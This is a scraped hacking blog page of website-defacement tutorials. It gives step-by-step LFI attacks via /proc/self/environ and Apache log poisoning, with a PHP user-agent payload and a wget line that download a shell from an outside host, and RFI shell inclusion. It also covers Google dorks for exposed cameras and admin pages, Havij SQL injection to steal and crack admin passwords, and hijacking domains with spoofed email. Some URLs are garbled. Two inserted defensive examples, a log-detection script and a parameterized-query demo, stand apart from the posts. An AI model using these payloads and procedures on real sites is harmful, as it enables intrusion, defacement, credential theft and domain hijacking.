Showing posts with label Dork. Show all posts

LFI- Defacing

[MethoD 1]

NOTE: You will need FireFox and its addon Tamper Data to do this method!

LFI, or Local File Inclusion, allows you to include a local file (that is, a file stored on the server) and run it in a web script.
In this method we are going to upload a shell by accessing proc/self/environ.

Now we have our page

http://www.target.com/index.php?include=register.php

And now we are going to do this:

http://www.target.com/index.php?include=../


If it gives you an error message, this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:

http://www.target.com/index.php?include=../etc/passwd


And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:

http://www.target.com/index.php?include=.../passwd
http://www.target.com/index.php?include=.../passwd
http://www.target.com/index.php?include=.../passwd


And so on. Now let's say we got to this URL

http://www.target.com/index.php?include=.../passwd

And we see some huge shitty text we cannot handle. Now change the etc/passwd in the URL to proc/self/environ so it looks like this:

http://www.target.com/index.php?include=...environ


If you see some text, you did good; if you see an error message, you did bad. Now this is the point where we use Tamper Data. Start Tamper Data and reload the page, and for the user agent you type in the following PHP script:

Code: 
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>


This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it.

Now simply access your shell by going to

http://www.taget.com/shell.php


And troll the server.

[Now LFI method 2]

NOTE: This only works on apache servers!

Alright you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd, you will try to get access to apache/logs/error.log

If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).

Now when you have found the file, open up cmd and type in

telnet http://www.tagrget.com 80

When you are inside the telnet, you copy the following code(you use your own shell url ofc)

Code: 
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>



Paste it into the telnet window, and press enter once or maybe twice(until you get an error message).

Now refresh the page in the browser(error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing in the following into your browser:

http://www.taget.com/shell.php

Author: AHFCREW blog
Video tut for the Tamper Data method!

http://www.youtube.com/watch?v=-YRdqD8199s

Agent's script used in the video:
Code: 
<?system('wget http://www.website.com/yourshell.txt -o shell.php');>


Deface via RFI

#Searching for Vuln. Sites
#Checking if they are Vuln.
#Defacing them


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Searching for Vuln. sites:

We can find Vuln.websites by using Google Dorks

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Checking if they are Vuln. :

Now after we searched for sites on Google, many sites will show up, but not all of them are Vuln.
So how can we check?

After opening the site, check the link. For example, it will be like:

http://www.tagert.com/index.php?page=ANYTHING

Now to check the site we should replace "ANYTHING" with "http://www.google.com"

so it will be like:

http://www.tagert.com/index.php?page=htt...google.com

IF the Google home page shows up, then the website is Vuln. for RFI,
IF not, then find another one.




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Defacing:


OK, now if we found a Vuln. website how to deface? o_O

well now open any website on any free host and upload your shell in .txt
and replace http://www.google.com to your shell link so for EXAMPLE it will be:
http://www.yourfreehost.com/shell.txt

http://www.tagert.com/index.php?page=htt...shell.txt?

[!]NOTE:- DO NOT FORGET THE '?' in the end of the URL

Now your shell will show so Deface the site
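A defender's view of the LFI and RFI requests described in the two posts above, as an added example that is not part of the original posts: a small Python classifier for web access-log lines. The log lines, the 192.0.2.10 address and the files.example host are constructed, and `classify` and its finding names are illustrative.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" format: "METHOD url PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'"(?:GET|POST|HEAD) (?P<url>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
TRAVERSAL = re.compile(r"\.\.[/\\]")
SENSITIVE = re.compile(r"etc/passwd|proc/self/environ|logs/error\.log", re.I)
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)

def classify(line):
    """Return the sorted list of findings for one access-log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    findings = set()
    query = urlsplit(m.group("url")).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; catch double encoding
        if TRAVERSAL.search(value):
            findings.add("path-traversal")
        if SENSITIVE.search(value):
            findings.add("sensitive-file")
        if REMOTE_URL.match(value):
            findings.add("remote-url-in-parameter")
    if "<?" in m.group("ua"):  # PHP open tag carried in the User-Agent header
        findings.add("php-tag-in-user-agent")
    return sorted(findings)

# Constructed sample lines (documentation address 192.0.2.10, reserved names).
PREFIX = '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
SAMPLE_LOG = [
    PREFIX + '"GET /index.php?include=register.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    PREFIX + '"GET /index.php?include=../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    PREFIX + '"GET /index.php?include=..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 200 900 '
             '"-" "<?php /* placeholder, not a payload */ ?>"',
    PREFIX + '"GET /index.php?page=http://files.example/shell.txt? HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry) or ["clean"], entry.split('"')[1])
```

Findings like these call for fixing the include itself: map the `include`/`page` parameter to a fixed allowlist of files and keep PHP's `allow_url_include` off.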

How To Hack Into Live Cameras Around The World

This simple technique is called “Google Hacking”. We are just looking for unsecured cameras around the world and writing a simple string on Google to hack into them.

Follow the steps below:
1) Choose any of these strings to enter on google

2) Once you have picked one, simply copy it, and paste it on Google.
3) Now choose any result and you will be seeing a live camera.

Find to Admin Page [Dork]




Put inurl: in front of all dorks, like:

inurl:admin1.php
inurl:admin.html

and so on.


Hack Websites Using Havij [SQL Injection Tutorial]


According to a survey, the most common technique of hacking a website is SQL injection. SQL injection is a technique in which a hacker inserts SQL code into a web forum to get sensitive information (like user names and passwords) to access the site and deface it. The traditional SQL injection method is quite difficult, but nowadays there are many tools available online through which any script kiddie can use SQL injection to deface a website; because of these tools, websites have become more vulnerable to these types of attacks.

One of the popular tools is Havij. Havij is an advanced SQL injection tool which makes SQL injection very easy for you; along with SQL injection, it has a built-in admin page finder, which makes it very effective.

Supported Databases With Havij

  • MsSQL 2000/2005 with error.
  • MsSQL 2000/2005 no error union based
  • MySQL union based
  • MySQL Blind
  • MySQL error based
  • MySQL time based
  • Oracle union based
  • MsAccess union based
  • Sybase (ASE)

Things We Need:

  1. Havij Tool - (Search In Google And Download Cracked Version.)
  2. SQLI Vulnerable Website. - Use Google Dorks To Search Vulnerable Website.

Start Tutorial.

  1. Open Havij.
  2. Type Vulnerable Website Inside It And Hit Analyze Button.
  3. Now Click On Tables Tab And Then Hit Get DBs Button.
  4. Now You Have Got All Databases In Result. Tick Databases And Hit Get Tables Button.
  5. You Have Got Tables From The Databases You Ticked In Previous Step. Now Tick Related Tables And Hit Get Columns Button.
  6. You Have Got Columns From Ticked Table. Tick Related Columns And Press Get Data Button. I Am Going To Choose Username, Password, UserGroup Columns. There Should Be Stored Data Related To Admin's Username, Password Etc.
  7. Bingo! You Have Got Username And Password Of Admin.


How To Crack Hash?


As You Can See, We Have Received All Information Of Admin, Like Username, Password And UserGroup. But We Have Received Password In The Shape Of Hash. In Order To See The Real Password, We Have To Crack This Code. For Cracking This Code, We Will Make Use Of Havij Tool Again. Follow Me To Crack This Hash.

  1. You Can See A Button Of MD5 In Buttons List Of Havij. Hit That Button And Paste Your Hash Code Inside It And Press Start Button.
  2. You Can See Password In Plain Text In Result Now. See Picture Below.

Find Admin Page


We Have Got Everything, Like Username, Password. But Where To Use Them And Get Admin Rights? You Need To Find The Admin Login Page Of Target Site. For Finding Admin Page Of Target Site, We Will Use Havij Again.

  1. In Buttons List, Press Find Admin Button. Type Homepage Url Of Target Site. Press Start Button.

You Will Get Result Same Like Hash Cracking. You Will Be Able To See The Page Which Admin Of Your Target Site Use To Login.

-------------------------------------------------------------------------------------------------------KNOXD3CrypT0r


Website hacking Methods.......


I am going to teach you some basics of website hacking, so first we are going to learn about website defacement.

1) What is Website defacement ?

A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.

A high-profile website defacement was carried out on the website of the company SCO Group following its assertion that Linux contained stolen code. The title of the page was changed from "Red Hat vs SCO" to "SCO vs World," with various satirical content following.




2) Terms to be used ---->

[SQL] - Structured Query Language
[LFI] - Local File Include
[RFI] - Remote File Include
[XSS] - Cross Site Scripting
[RCE] - Remote Code Execution
[AFD] - Arbitrary File Download
[SCD] - Source Code Disclosure
[PCI] - PHP Code Injection

3) Defacement techniques ?

I). DNS hijacking
II). FTP Protocol
III). Apache Vulnerable
IV). Script, Cookie, XSS
V). Social Engineering.
VI). SQL Injection
VII). RFI.


  

Now :-

I) What is Domain Hacking ?

Domain hacking is the process of transferring a domain (yahoo.com) without the owner's permission with the help of phishing, sniffing, or spoofing.

A domain hack is an unconventional domain name that combines domain levels, especially the top-level domain (TLD), to spell out the full "name" or title of the domain, making a kind of fun.

------->Domain Hacking process :--->

a) See who.is record of Slave(XXABCXX.net) DNS record and note down admin email (xxabcxx@gmail/ymail/hotmail/live/[whatever apply this exception if possible admin(name)@XXABCXX.net] )
b) Send spoof mail to Slave admin email for password.
c) after open domain registrar ---->(my.india s.com) their domain control panel (click forget password)
d) After you get a password in Slave email address of Slave domain.
e) Just login on domain control panel.
f) and get ECCP code and create new account on hosting company and choose Domain transfer (all submit all details)
g) You will get all rights on this domain for lifetime.



  

II) What is FTP Protocol ?




The File Transfer Protocol (FTP) provides the basic elements of file sharing between hosts. FTP uses TCP to create a virtual connection for control information and then creates a separate TCP connection for data transfers. The control connection uses an image of the TELNET protocol to exchange commands and messages between hosts.


for detail check this Detail about FTP




III) What is XSS ?




XSS is a type of computer security vulnerability typically found in web applications which allows code injection by malicious web users into the web pages viewed by other users.

Cross Site Scripting is a technique used to add script to a trusted site that will be executed on other users' browsers. A key element of XSS is that one user can submit data to a website that will later be displayed for other users. It is necessary that the bad guy NOT mess up the HTML structure, otherwise the result will be web defacement rather than attacking other users.




IV) What is Social Engineering ?




Social engineering is the act of manipulating people into doing actions or exposing confidential information. It's trickery or deception for information gathering, fraud, or computer system access, wherein the hacker never comes face-to-face with the Slave. Here are


I don't want to make my thread so big in size so i helped myself by


LINK



V) What is SQL injection ?



SQL injection is a type of security exploit in which the attacker injects Structured Query Language (SQL) code through a web form input box, to gain access to resources, or make changes to data.

It is a technique of injecting SQL commands to exploit non-validated input vulnerabilities in a web application database.




-------------->Preventing SQL Injection


To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parameterized statements must be used (preferred), or user input must be carefully escaped or filtered.
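The difference between embedding input in the statement and binding it as a parameter, shown as an added example (not code from the original post) using Python's built-in `sqlite3` module. The table, its single row and the function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data: an in-memory table with a single account.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT, usergroup TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-hash', 'administrators')")
    return db

def find_user_concatenated(db, username):
    # Weak form: user input is embedded directly in the SQL statement,
    # so quote characters in the input change the structure of the query.
    sql = "SELECT username, usergroup FROM users WHERE username = '" + username + "'"
    return db.execute(sql).fetchall()

def find_user_parameterized(db, username):
    # Preferred form: the statement text is fixed and the input is bound as
    # a value, so it is only ever compared against the column.
    sql = "SELECT username, usergroup FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchall()

def compare(username):
    """Run both lookups on a fresh database; return (weak, parameterized)."""
    db = make_db()
    try:
        try:
            weak = find_user_concatenated(db, username)
        except sqlite3.Error as exc:
            weak = "error: " + type(exc).__name__
        return weak, find_user_parameterized(db, username)
    finally:
        db.close()

if __name__ == "__main__":
    # A normal lookup, a legitimate name containing a quote, and an input
    # that rewrites the WHERE clause when concatenated.
    for value in ("admin", "O'Brien", "nobody' OR '1'='1"):
        weak, safe = compare(value)
        print(repr(value), "| concatenated:", weak, "| parameterized:", safe)
```

The concatenated query fails on an ordinary apostrophe and returns every row for the third input, while the parameterized query returns no rows for both.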



VI) What is RFI ?

  

Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own (malicious) code in the space provided for PHP programs on a web page.
